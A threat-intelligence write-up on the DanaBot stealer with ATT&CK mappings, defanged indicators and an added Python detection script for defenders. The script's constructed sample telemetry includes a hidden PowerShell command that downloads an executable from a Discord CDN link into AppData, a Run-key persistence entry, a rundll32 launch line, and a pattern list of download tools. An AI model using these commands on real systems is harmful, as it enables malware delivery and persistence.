DanaBot Malware Analysis | DanaBot Stealer | Emerging Malware

DanaBot Stealer is a modular malware-as-a-service information stealer that uses a multi-stage infection chain, phishing, and legitimate services to deliver and conceal payloads while exfiltrating sensitive data. The report details its infection flow, persistence, data collection, and evasion techniques, highlighting how threat actors adapt tactics across stages to evade detection. #DanaBot #DiscordCDN

Keypoints

  • DanaBot Stealer is an emerging stealer malware distributed via phishing campaigns.
  • It employs a multi-level infection process to achieve compromise and evade detection.
  • The initial payload is delivered as obfuscated JavaScript that triggers downstream stages.
  • The first-stage payload is downloaded via Discord CDN, with subsequent stages pulled from an FTP server.
  • The malware sets up a proxy server on the host to intercept device communications.
  • It inventories installed software and financial data (cards, crypto wallets) and exfiltrates data over encrypted channels.

MITRE Techniques

  • [T1592] Gather Victim Host Information – Enumerates the compromised system for victim and system profiling. “Enumerates the compromised system for victim and system profiling.”
  • [T1566] Phishing – DanaBot is distributed through phishing emails whose malicious attachment is the primary vector for downloading and executing the payload. “The deployment of DanaBot stealer… employing advanced phishing campaigns… A malevolent attachment serves as the primary vector for downloading and executing the payload within these emails.”
  • [T1059.001] PowerShell – PowerShell is used to download a second-stage malware after CMD triggers it. “The Windows Command Shell (CMD), subsequently initiating PowerShell to download a second-stage malware.”
  • [T1059.003] Windows Command Shell – Windows Command Shell is used to initiate the sequence that leads to PowerShell download. “The Windows Command Shell (CMD), subsequently initiating PowerShell to download a second-stage malware.”
  • [T1059.007] JavaScript – The first stage malware is a JavaScript file. “The first stage malware is a JavaScript file.”
  • [T1204.002] Malicious File – The dropped payload includes a 32-bit Windows executable TemprmT88.exe downloaded to the user’s AppData path. “downloads an executable TemprmT88.exe in the C:\Users\USER\AppData\Local directory of the current user.”
  • [T1547.001] Registry Run Keys / Startup Folder – Persistence via a startup execution registry entry. “persistence, malware adds itself to the ‘Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ registry and runs as startup program at every system restart.”
  • [T1055.012] Process Hollowing – The analysis references RunPE (Process hollowing) to execute shellcode within a suspended process. “shellcode… and resumes the execution” (Process Hollowing).
  • [T1218.011] Rundll32 – Uses rundll32 to invoke shell32.dll with pythonw.exe as a parameter. “Next, it triggers rundll32.exe, which subsequently executes shell32.dll with pythonw.exe as a parameter.”
  • [T1104] Multi-Stage Channels – The malware uses a multi-stage payload delivery chain across distinct sources. “multi-stage payloads from diverse sources.”
  • [T1573] Encrypted Channel – Exfiltration occurs over an encrypted channel. “exfiltrate the collected data… over encrypted (SSLv2) connection.”
  • [T1071.001] Web Protocols – C2 and data transfer leverage web protocols (Discord CDN, FTP). “Web Protocols” (Discord CDN and FTP usage cited in the article).
  • [T1020] Automated Exfiltration – Data is exfiltrated automatically from the infected host. “Exfiltrate the stolen data to servers controlled by the threat actor over encrypted channel.”
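The technique list above maps to a recognisable chain on the endpoint: a script host running the .js attachment, cmd.exe spawning a PowerShell download cradle, a dropped executable under AppData\Local, an HKCU Run-key value pointing at it, and rundll32 loading shell32.dll to launch pythonw.exe. The following Python is an added detection example, not code from the CYFIRMA report or from DanaBot itself. It runs a handful of rules over constructed process-creation and registry-set events (the `Event` field names are a hypothetical schema, not any vendor's EDR format). The `ShellExec_RunDLL` export in the rundll32 sample line is an assumption: the report only states that shell32.dll is invoked with pythonw.exe as a parameter.

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    """One endpoint telemetry record (constructed; hypothetical schema)."""
    kind: str            # "process" (process creation) or "registry" (value set)
    image: str = ""      # full path of the created process
    cmdline: str = ""    # its command line
    parent: str = ""     # full path of the parent process
    key: str = ""        # registry key, for kind == "registry"
    data: str = ""       # registry value data, for kind == "registry"


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOAD_CRADLE = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadfile|downloadstring|net\.webclient|"
    r"start-bitstransfer|\bcurl\b|\bwget\b)", re.I)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(\\|$)", re.I)
APPDATA = re.compile(r"\\AppData\\(Local|Roaming)\\", re.I)
JS_FILE = re.compile(r"\.jse?\b", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (technique_id, description) pairs for events matching the DanaBot chain."""
    findings = []
    for e in events:
        if e.kind == "process":
            img, par, cl = basename(e.image), basename(e.parent), e.cmdline
            if img in SCRIPT_HOSTS and JS_FILE.search(cl):
                findings.append(("T1059.007", f"script host executing JavaScript: {cl}"))
            if img == "cmd.exe" and par in SCRIPT_HOSTS:
                findings.append(("T1059.003", f"cmd.exe spawned by script host {par}"))
            if img == "powershell.exe" and DOWNLOAD_CRADLE.search(cl):
                findings.append(("T1059.001", f"PowerShell download cradle: {cl[:70]}"))
            if par == "powershell.exe" and img.endswith(".exe") and APPDATA.search(e.image):
                findings.append(("T1204.002", f"PowerShell launched dropped executable {e.image}"))
            if img == "rundll32.exe" and "shell32.dll" in cl.lower() and "pythonw" in cl.lower():
                findings.append(("T1218.011", "rundll32 shell32.dll used to launch pythonw.exe"))
        elif e.kind == "registry":
            if RUN_KEY.search(e.key) and APPDATA.search(e.data):
                findings.append(("T1547.001", f"Run-key value points into AppData: {e.data}"))
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DROPPED = r"C:\Users\USER\AppData\Local\TemprmT88.exe"

# Constructed sample telemetry modelled on the reported chain; not real logs.
SAMPLE_EVENTS = [
    Event("process", image=r"C:\Windows\System32\wscript.exe",
          cmdline=r'wscript.exe "C:\Users\USER\Downloads\Purchase_Order_11_25_2023.js"',
          parent=r"C:\Windows\explorer.exe"),
    Event("process", image=r"C:\Windows\System32\cmd.exe",
          cmdline="cmd.exe /c powershell -w hidden ...",
          parent=r"C:\Windows\System32\wscript.exe"),
    Event("process", image=PS,
          cmdline=r'powershell.exe -w hidden -c "Invoke-WebRequest '
                  r'https://cdn.discordapp.com/attachments/<attachment-id>/t4.exe '
                  r'-OutFile ' + DROPPED + '"',
          parent=r"C:\Windows\System32\cmd.exe"),
    Event("process", image=DROPPED, cmdline=DROPPED, parent=PS),
    Event("registry", key=r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TemprmT88",
          data=DROPPED),
    # ShellExec_RunDLL export is an assumption; the report names only shell32.dll + pythonw.exe.
    Event("process", image=r"C:\Windows\System32\rundll32.exe",
          cmdline=r"rundll32.exe shell32.dll,ShellExec_RunDLL pythonw.exe "
                  r"C:\Users\USER\AppData\Local\python.py",
          parent=DROPPED),
    # Benign admin usage that should not fire any rule.
    Event("process", image=PS, cmdline="powershell.exe -NoProfile -Command Get-Process",
          parent=r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for tid, desc in detect(SAMPLE_EVENTS):
        print(f"{tid}: {desc}")
```

Each rule keys on a parent/child or argument relationship rather than on the file hashes, so it keeps firing when the actor rotates the dropper name or the Discord attachment URL; the Run-key rule in particular deliberately ignores the value name and only asks whether a startup entry points into a user-writable AppData path.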

Indicators of Compromise

  • [MD5] File Hashes – Purchase_Order_11_25_2023.js, TemprmT88.exe, and 2 more hashes
  • [SHA-256] File Hashes – Purchase_Order_11_25_2023.js, TemprmT88.exe, and 2 more hashes
  • [MD5] File Hashes – TemprmT88.exe, and 2 more hashes
  • [SHA-256] File Hashes – TemprmT88.exe, and 2 more hashes
  • [MD5] Filename Hashes – Add.zip, and 2 more hashes
  • [SHA-256] Filename Hashes – Add.zip, and 2 more hashes
  • [MD5] Filename – python.py, and 2 more hashes
  • [SHA-256] Filename – python.py, and 2 more hashes
  • [MD5] Filename – Bot.ENC, and 2 more hashes
  • [SHA-256] Filename – Bot.ENC, and 2 more hashes
  • [URL] Discord CDN payload – https[:]//cdn[.]discordapp[.]com/attachments/1176544174691061881/1176597933827829822/t4[.]exe
  • [IP] FTP server – 195[.]85[.]115[.]195
  • [MD5] File – Purchase_Order_11_25_2023.js
  • [Domain] Domains – 1e100.net, maa03s46-in-f8.1e100.net
  • [IP] Additional IP – 45[.]129[.]14[.]157

Read more: https://www.cyfirma.com/outofband/danabot-stealer-a-multistage-maas-malware-re-emerges-with-reduced-detectability/